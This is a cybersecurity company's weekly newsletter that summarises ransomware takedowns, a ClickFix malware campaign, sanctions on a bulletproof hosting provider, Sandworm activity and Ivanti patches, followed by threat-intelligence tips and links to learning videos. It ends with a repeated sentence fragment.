Hello there 👋

Welcome back to the Kraven Security weekly newsletter, triaging the week. We round up the week’s top news stories, highlight our featured article, give you some learning resources, and finish with a few personal notes about what’s happening at the company. Enjoy!

Top 5 News Stories

Global Law Enforcement Seizes 8Base Ransomware Data Leak Sites in Major Crackdown

A global law enforcement operation, “Phobos Aetor,” has dismantled 8Base ransomware’s dark web sites and arrested four suspects linked to Phobos ransomware in Thailand. The takedown involved agencies from 11 countries, marking a significant blow to the gang responsible for over $16M in cyber extortion.

Key takeaways:
🚨 Operation Success: “Phobos Aetor” led to the seizure of 8Base’s data leak and negotiation sites.
👮 Arrests: Four European suspects (two men and two women) were apprehended in Phuket, Thailand.
🌍 Global Effort: Involved agencies from the UK, US, Japan, and eight other nations, coordinated by Europol.
💰 Extortion Scale: The gang allegedly earned $16M, targeting over 1,000 victims worldwide, including 17 Swiss companies.
🔍 Evidence Seizure: Laptops, smartphones, and crypto wallets were confiscated for forensic analysis.

The Nation

Cybercriminals Use ClickFix Technique to Deploy NetSupport RAT

Cyber attackers are abusing the ClickFix method to distribute NetSupport RAT by tricking users with fake CAPTCHA pages into executing PowerShell commands. This malware gives attackers full control over compromised systems, highlighting the need for vigilance against deceptive browser prompts.

Key takeaways:
⚠️ Exploitation Method: Threat actors use ClickFix, a social engineering tactic, to deploy NetSupport RAT.
🔗 Fake CAPTCHA: Malicious websites masquerade as CAPTCHA checks to execute harmful PowerShell scripts.
🖥️ Malware Capabilities: NetSupport RAT allows attackers to remotely control devices, including screen monitoring and file manipulation.
🔍 Prevalence: Over 6,000 WordPress sites have been compromised in recent ClickFix campaigns.
🛡️ Security Advice: Users should be cautious of unexpected browser updates or CAPTCHA prompts and ensure they’re on legitimate sites.

🎯 Threat Hunting Package

eSentire

US Sanctions LockBit Ransomware’s Bulletproof Hosting Provider

The US, the UK, and Australia have sanctioned Zservers, a Russian bulletproof hosting provider accused of facilitating LockBit ransomware attacks. This move targets the infrastructure supporting one of the world’s most notorious ransomware groups.

Key takeaways:
🧑‍⚖️ Sanctions Imposed: The U.S. Treasury Department has sanctioned Zservers for supporting LockBit.
👥 Individuals Named: Alexander Igorevich Mishin and Aleksandr Sergeyevich Bolshakov, both from Russia, were identified as key figures behind Zservers.
🌐 International Effort: Sanctions are part of a broader AUKUS alliance action against cybercrime.
🕵️ Evidence of Use: Zservers’ infrastructure has been linked to LockBit since at least 2022, with servers used for ransomware operations.
🔒 Impact on Cybercrime: This sanction aims to disrupt the bulletproof hosting services that cybercriminals rely on for anonymity and persistence.

U.S. Department of the Treasury

BadPilot Network Hacking Fuels Russian Sandworm’s Global Cyber Attacks

Microsoft has uncovered BadPilot, a subgroup of the notorious Russian Sandworm hacking group, engaging in a widespread campaign exploiting eight security flaws to infiltrate critical sectors worldwide, including energy and telecommunications.

Key takeaways:

😈 Russian Cyber Threat: BadPilot, a part of Sandworm (also known as APT44), is behind a sophisticated cyber espionage operation.

🔓 Exploited Vulnerabilities: Eight different security flaws are used to gain initial access to networks globally.

🌐 Global Targets: The campaign targets critical infrastructure in over 15 countries, focusing on energy, oil and gas, and government entities.

🕵️ Persistent Access: The aim is to maintain long-term access for espionage and potential future attacks.

⚠️ Urgent Need for Vigilance: Organizations are advised to patch known vulnerabilities and strengthen network defenses.

🎯 Threat Hunting Package

Microsoft Security

Ivanti Patches Three Critical Vulnerabilities in Connect Secure and Policy Secure

Ivanti has urgently patched three critical vulnerabilities in its Connect Secure, Policy Secure, and Secure Access Client products. Immediate updates are recommended to prevent remote code execution and other severe security breaches.

Key takeaways:
🔒 Critical Patches: Ivanti has fixed three high-severity issues, one of which allowed remote code execution (CVE-2025-22467).
🚨 No Mitigations: No workarounds are available; the only solution is to apply the latest software updates.
📅 Update Details: Patches are available for ICS version 22.7R2.6, IPS version 22.7R1.3, and ISAC version 22.8R1.
🔍 Discovery: Flaws were identified through Ivanti’s responsible disclosure program and external security researchers.
⚠️ Support Limitation: Ivanti will not fix the older Pulse Connect Secure 9.x line, as support has ended.

Ivanti

Top Tips of the Week

Threat Intelligence

Document your CTI processes thoroughly. Clear documentation aids in understanding, dissemination, and continuous improvement.
Monitor the deep and dark web for chatter. Proactively identify discussions related to your organization for early threat detection.

Threat Hunting

Share findings with the community. Collective insights strengthen everyone’s ability to respond to threats.
Implement a feedback loop in cyber threat hunting. Gather insights from team members and stakeholders to continually improve processes.
Stay agile. The threat landscape evolves; so should your threat hunting strategy. Adaptability is key to effective cybersecurity.

Custom Tooling

Consider the user’s perspective in custom tool design. Prioritize features and functionalities based on user needs and preferences.
Encourage collaboration between developers and end-users in custom tool design. Align functionality with user needs and expectations.

Feature Article

Cyber threat intelligence can be a game-changer for most organizations. It enables them to proactively manage the risks they face when conducting business in the cyber domain. But what does this look like? What key roles and responsibilities does a CTI team have?

This guide answers these questions by explaining how a CTI team fits into the larger business and the key roles within a CTI team that are required to fulfill its mission. This includes general roles, like CTI manager and analyst, and specialized roles, such as CTI engineer, threat hunter, and dark web researcher.

Each role is pivotal in ensuring the CTI team can collect, analyze, and share threat intelligence that informs key business decisions. That’s why this guide also showcases how these roles work together by breaking the CTI process into the OODA loop, CTI lifecycle, and F3EAD loop.

Let’s get started exploring what you need to build a great CTI team!

Read Now

Learning Resources

UK Demands Apple Create Backdoor

Backdoors are bad. Period. But that hasn’t stopped the UK government from secretly making a demand for Apple to create a backdoor to access encrypted iCloud data worldwide, citing the Investigatory Powers Act of 2016.

This law grants MI5 and MI6 extensive surveillance capabilities, making it illegal for Apple to disclose the request. The move raises serious concerns for global privacy, as it could set a precedent for undermining end-to-end encryption used by services like Signal and WhatsApp.

This entertaining video describes the situation and advocates some measures you can take to protect yourself!

New Free Malware Research Tool Drops

Group-IB has just released a powerful, free malware research tool that requires no sign-up. The tool allows users to analyze malware by searching for file names, hashes, or artifacts and provides detailed reports, including process tracking, file modifications, and network activity.

This great video from Gary Ruddell showcases how you can explore malware behaviors through a visual graph, view MITRE ATT&CK techniques used, and access credentials stored within infections.

An awesome tool to help investigators quickly assess threats and identify malicious activities in their environments.

Ransomware Tools, Techniques, and Strategies

Discover the tools, techniques, and strategies used by cybercriminals to conduct ransomware operations in this insightful presentation from Will Thomas.

He explains how ransomware gangs leverage step-by-step guides, common vulnerabilities, and templated attacks to exploit organizations worldwide. Then, explores how defenders can counter these threats by understanding attacker methodologies, blocking commonly used tools, and leveraging threat intelligence for proactive defense.

A must-watch for anyone wanting to learn how to better combat ransomware!

Understanding Adversary Intent

This great presentation from the legendary Robert M. Lee explores the complexities of understanding adversary intent in cybersecurity, emphasizing the challenges of attribution and intelligence gathering.

He highlights biases in data collection, the difficulty of assessing an attacker’s true objectives, and how these uncertainties can impact decision-making. Using real-world case studies, including cyberattacks on power grids and industrial control systems, the talk underscores how attribution can sometimes mislead security teams rather than help them.

Rob encourages cybersecurity professionals to refine their threat models based on observed behavior rather than assumptions about attacker motives.

lores the complexities of understanding adversary intent in cybersecurity, emphasizing the challenges of attribution and intelligence gathering.